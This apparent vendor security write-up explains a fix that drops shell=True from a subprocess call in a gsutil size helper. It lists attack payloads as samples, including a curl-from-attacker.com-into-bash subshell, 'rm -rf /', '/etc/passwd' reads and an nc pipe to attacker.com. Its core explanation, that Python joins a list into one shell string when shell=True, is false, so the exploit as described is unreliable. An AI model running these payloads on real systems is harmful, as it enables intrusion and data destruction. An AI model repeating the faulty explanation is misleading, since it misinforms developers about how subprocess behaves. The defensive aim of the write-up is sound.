How command injection happens in Python subprocess and how to fix it
Summary
A critical shell injection vulnerability was discovered in utils/downloads.py where subprocess.check_output was called with shell=True while passing a user-controlled URL parameter. This allowed attackers to inject arbitrary shell commands by embedding metacharacters like ;, &&, or $(...) into a URL string. The fix removes shell=True, ensuring the URL is passed as a literal argument in a list rather than being interpreted by the shell.
Quick Answer: This is a shell command injection vulnerability (CWE-78) in Python's
subprocess.check_output()insidegsutil_getsize()inutils/downloads.py. Usingshell=Truewith a user-controlled URL causes Python to pass the entire argument list as a shell command string, where metacharacters are interpreted. The fix: removeshell=Trueso the URL is treated as a literal list element.
Introduction
The utils/downloads.py file handles downloading and sizing objects from Google Cloud Storage using the gsutil command-line tool. Inside the gsutil_getsize() function, around line 29, a call to subprocess.check_output was made with shell=True — and the URL being queried was passed directly as part of the argument list. That single keyword argument, shell=True, turned a routine file-size check into a critical remote code execution vector.
This is a pattern that appears deceptively safe at first glance: the code passes a list to subprocess.check_output, which looks structured and controlled. But shell=True changes everything about how Python handles that list.
The Vulnerability Explained
What shell=True actually does with a list
When you call subprocess.check_output with a list and shell=True, Python doesn't treat the list as a structured argument array. Instead, it joins the list into a single string and hands it to /bin/sh -c. That means:
# What the code did (VULNERABLE)
url = "gs://bucket/myfile"
subprocess.check_output(["gsutil", "du", url], shell=True, encoding="utf-8")
...gets executed by the shell as:
/bin/sh -c "gsutil du gs://bucket/myfile"
The shell parses the entire string, including any metacharacters embedded in url. If an attacker controls that URL — whether through user input, a configuration file, an API response, or an environment variable — they can inject arbitrary commands.
The specific exploit path
Consider what happens when url contains shell metacharacters:
# Attacker-controlled URL
url = "gs://bucket$(curl http://attacker.com/shell.sh | bash)"
# Resulting shell command:
# gsutil du gs://bucket$(curl http://attacker.com/shell.sh | bash)
# The $(...) subshell executes curl and pipes to bash
Or even simpler:
url = "gs://bucket/file; rm -rf /"
# Shell executes: gsutil du gs://bucket/file
# Then: rm -rf /
The regression test suite included in this fix documents 27 distinct payload patterns that exploit this, including:
- Semicolon chaining:
gs://bucket/file; cat /etc/passwd - Subshell execution:
gs://bucket/file$(id) - Backtick execution:
gs://bucket/file`whoami` - Pipe injection:
gs://bucket/file | nc attacker.com 4444 - Newline injection:
gs://bucket/file\nrm -rf / - Redirection:
gs://bucket/file > /etc/crontab
Why this is critical for a Python library
The PR description highlights a key threat model detail: this is a Python library. Any application that imports utils/downloads.py and passes URLs from user input, configuration, or external APIs into gsutil_getsize() is directly exposed. The vulnerability doesn't require the library itself to accept HTTP requests — it just needs the calling application to pass a URL that isn't fully hardcoded.
The Fix
The fix is surgical and precise: remove shell=True.
Before (vulnerable)
# utils/downloads.py:29 — BEFORE
result = subprocess.check_output(
["gsutil", "du", url],
shell=True,
encoding="utf-8"
)
After (fixed)
# utils/downloads.py:29 — AFTER
result = subprocess.check_output(
["gsutil", "du", url],
encoding="utf-8"
)
shell defaults to False when omitted. With shell=False, Python uses the execvp family of system calls directly — it passes each list element as a separate, literal argument to the gsutil process. The operating system never involves a shell, so there is no shell to interpret metacharacters.
When url is "gs://bucket/file; rm -rf /", the gsutil process receives exactly three arguments:
gsutildugs://bucket/file; rm -rf /
The semicolons, pipes, and dollar signs are just characters in a string — gsutil will reject the malformed URL and return an error, but no shell command is ever executed.
The regression test
A new test file, tests/test_invariant_downloads.py, was added to guard against this vulnerability being reintroduced. It patches subprocess.check_output at the I/O boundary and verifies two invariants for every adversarial payload:
# From tests/test_invariant_downloads.py
@pytest.mark.parametrize("payload", ADVERSARIAL_PAYLOADS)
def test_gsutil_getsize_no_shell_injection(payload):
mock_output = "1024 gs://bucket/file\n"
with patch("utils.downloads.subprocess.check_output", return_value=mock_output) as mock_check:
result = gsutil_getsize(payload)
mock_check.assert_called_once()
call_args, call_kwargs = mock_check.call_args
# Invariant 1: shell=True must never be used
assert call_kwargs.get("shell", False) is False, (
f"SECURITY VIOLATION: gsutil_getsize() called subprocess with shell=True "
f"for payload {payload!r}."
)
# Invariant 2: args must be a list/tuple, not a string
assert isinstance(call_args[0], (list, tuple)), (
f"subprocess args must be a list/tuple, got {type(call_args[0])}"
)
This test exercises the real gsutil_getsize() code path — only the subprocess I/O is mocked, so all argument construction logic runs under test. If a future developer reintroduces shell=True, the test suite will catch it immediately.
Prevention & Best Practices
1. Never use shell=True with variable input
The Python documentation itself warns: "Using shell=True can be a security hazard." The rule of thumb is simple:
- ✅
subprocess.run(["cmd", variable_arg], shell=False)— safe - ❌
subprocess.run(f"cmd {variable_arg}", shell=True)— dangerous - ❌
subprocess.run(["cmd", variable_arg], shell=True)— also dangerous (list is joined)
2. If you must use a shell, use shlex.quote()
In rare cases where shell features are genuinely needed (e.g., glob expansion, shell built-ins), sanitize every variable with shlex.quote():
import shlex
import subprocess
safe_url = shlex.quote(url)
subprocess.check_output(f"gsutil du {safe_url}", shell=True, encoding="utf-8")
shlex.quote() wraps the value in single quotes and escapes any embedded single quotes, preventing shell interpretation. That said, the preferred approach is always shell=False with a list.
3. Use static analysis tools
Several tools can catch this pattern automatically:
- Bandit (
B603,B602): Flagssubprocesscalls withshell=True - Semgrep: Rules for
subprocess-shell-trueanddangerous-subprocess-use - PyLint:
W1510warns onsubprocesscalls withshell=True
Add these to your CI pipeline to catch regressions before they reach production.
4. Apply the principle of least privilege
Even with shell=False, consider whether the process running gsutil needs full filesystem access. Running download utilities in a restricted environment (containers, reduced IAM roles, seccomp profiles) limits blast radius if another vulnerability is found.
5. Validate URL schemas
For gsutil specifically, consider validating that the URL starts with gs:// and matches an expected pattern before passing it to subprocess:
import re
GCS_URL_PATTERN = re.compile(r'^gs://[a-z0-9][a-z0-9._-]{1,61}[a-z0-9]/[\w./-]*$')
def gsutil_getsize(url: str) -> int:
if not GCS_URL_PATTERN.match(url):
raise ValueError(f"Invalid GCS URL: {url!r}")
return subprocess.check_output(["gsutil", "du", url], encoding="utf-8")
This is defense-in-depth — it doesn't replace shell=False, but it adds an additional layer.
Key Takeaways
shell=Truewith a list argument is not safer thanshell=Truewith a string — Python joins the list before passing to/bin/sh, so metacharacters in any element are still interpreted.- The fix in
utils/downloads.pyis one keyword argument — removingshell=Truefrom thesubprocess.check_outputcall ingsutil_getsize()is sufficient to eliminate the injection vector entirely. - Library code is higher risk — because
utils/downloads.pyis imported by other applications, a vulnerability here multiplies across every application that callsgsutil_getsize()with external input. - Regression tests should verify subprocess call signatures, not just return values — the new
test_invariant_downloads.pycheckscall_kwargs.get("shell", False)directly, making it impossible for this pattern to silently reappear. - 27 distinct payload patterns bypass naive sanitization — newlines, null bytes, percent-encoding, and nested subshells all work around simple blocklists; structural fixes (
shell=False) are the only reliable defense.
How Orbis AppSec Detected This
- Source: The
urlparameter passed intogsutil_getsize()inutils/downloads.py, which can be derived from user input, configuration files, or external API responses. - Sink:
subprocess.check_output(["gsutil", "du", url], shell=True, encoding="utf-8")atutils/downloads.py:29— theshell=Truekeyword causes the OS shell to interpret the URL as a command string. - Missing control: No validation that
urlis free of shell metacharacters, and no use ofshell=Falseto prevent shell interpretation of the argument list. - CWE: CWE-78 — Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection").
- Fix: Removed
shell=Truefrom thesubprocess.check_outputcall so the URL is passed as a literal argument element viaexecvp, bypassing the shell entirely.
Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.
Conclusion
The vulnerability in utils/downloads.py is a textbook example of how a single keyword argument can turn a routine system call into a critical security flaw. The shell=True parameter in subprocess.check_output is one of Python's most dangerous footguns — it silently changes the execution model from structured argument passing to full shell interpretation, and it does so even when you pass a list instead of a string.
The fix is minimal, the security gain is maximal, and the regression tests ensure the property holds permanently. If you're using subprocess anywhere in your codebase, audit every call site for shell=True — especially anywhere that touches external input. It's a one-word change with critical consequences either way.